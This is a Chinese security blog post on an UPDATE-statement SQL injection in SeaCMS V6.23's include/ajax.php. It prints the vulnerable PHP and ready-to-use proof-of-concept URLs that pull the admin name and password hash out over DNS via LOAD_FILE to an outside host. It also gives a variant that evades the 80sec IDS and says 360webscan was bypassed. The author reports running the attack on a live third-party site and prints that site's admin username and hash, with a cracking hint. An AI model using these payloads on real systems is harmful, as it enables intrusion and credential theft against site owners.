Seacms最新版多处update注入(绕过360webscan)


Aug 31 2016

Seacms最新版多处update注入(绕过360webscan)

首页 » 代码审计 » Seacms最新版多处update注入(绕过360webscan)   

Seacms最新版多处update注入(绕过360webscan)

update注入一枚,通过dns直接获取敏感信息。

版本:V6.23

同时绕过80sec ids,360webscan

SeaCms有一个类似全局注册变量的机制,为后面的漏洞埋下了伏笔


 

//检查和注册外部提交的变量

foreach($_REQUEST as $_k=>$_v)
{
if( strlen($_k)>0 && m_eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )
{
exit('Request var not allow!');
}
}

function _RunMagicQuotes(&$svar)
{
if(!get_magic_quotes_gpc())
{
if( is_array($svar) )
{
foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
}
else
{
$svar = addslashes($svar);
}
}
return $svar;
}

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}

 

 


漏洞文件:\include\ajax.php

11-44行
 

switch ($action) {
case "digg":
case "tread":
case "score":
echo scoreVideo($action);
break;
case "diggnews":
case "treadnews":
case "scorenews":
echo scoreNews($action);
break;
case "hit":
echo updateHit();
break;
case "hitnews":
echo updateHitNews();
break;
case "addfav":
echo addfav();
break;
case "videoscore":
case "newsscore":
echo getScore($action);
break;
case "vpingfen":
echo vpingfen($action);
break;
case "npingfen":
echo npingfen($action);
break;
case "member":
echo member();
break;
}

 


问题出在了scoreVideo()函数,跟进这个函数


 

function scoreVideo($operType){
global $id,$dsql,$score;

if($id < 1) return "err";
.......此处省略几行代码..........
}elseif($operType=="score"){
if(GetCookie("ssea3_score".$id)=="ok") return "havescore";
$dsql->ExecuteNoneQuery("Update `sea_data` set v_scorenum=v_scorenum+1,v_score=v_score+".$score." where v_id=$id");
PutCookie("ssea3_score".$id,"ok",3600 * 24,'/');
return '';
}else{
return "err";
}
}

 


$dsql->ExecuteNoneQuery("Update `sea_data` set v_scorenum=v_scorenum+1,v_score=v_score+".$score." where v_id=$id");

 

$id和$score都可以控,造成了SQL注入。

 

$score=2,v_digg=(select user())
的时候,意外的把字段v_digg的内容利用子查询更新成工具者想获取的信息

 

接下来编写poc

 

首先理清程序的逻辑

 

$action=score 才能进入scoreVideo()这个函数

 

同时$id要大于1,否则 return "err";

 

Cookie中ssea3_score.$id的值不能为ok,否则 return "havescore";

 

因为无法直接获取子查询的数据,这里我使用DNS来获取数据(这个方法的局限性是目标环境要使用root用户连接的数据库才能获取到数据)

 

参考《在SQL注入中使用DNS获取数据》

http://**.**.**.**/tips/5283

 

理论上poc为:


 

http://localhost/include/ajax.php?action=score&id=1&score=2,v_digg=(SELECT%20LOAD_FILE(CONCAT(0x5c5c5c5c,(select%20concat_ws(0x5f,name,password)%20from%20sea_admin%20limit%201),0x2e33633866396633646330633032363538356261303131326633316335353632632e776f6f79756e2e67715c5c5c5c666f6f626172)))

 


但是由于程序使用了80sec的ids。绕过后的POC:
 

http://localhost/include/ajax.php?action=score&id=1&score=@`\'`,v_digg=(SELECT%20LOAD_FILE(CONCAT(0x5c5c5c5c,(select%20concat_ws(0x5f,name,password)%20from%20sea_admin%20limit%201),0x2e33633866396633646330633032363538356261303131326633316335353632632e776f6f79756e2e67715c5c5c5c666f6f626172))),v_hit=@`\'`

 


在本地调试的时候,360webscan不会进行拦截,但在实际线上环境中,上面的poc是会被360webscan拦截的。


 1.png

 

此还得绕过360webscan(最终poc在测试代码中)
找了一个线上环境:http://**.**.**.**/
dns获取到的
 

 

 2.png

 

 

用户:mosss 密码:78832884f6c8c932a264
Seacms的加密方式和dedecms都是20位的md5,要还原密码得前减3位后减1位,得到16位MD53.png

 

 

正文部分到此结束

文章标签: Seacms漏洞 Seacms注入 绕过360webscan

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «360webscan防御脚本绕过 | cmseasy最新注入+360webscan的绕过分析»

这篇文章还没有收到评论,赶紧来抢沙发吧~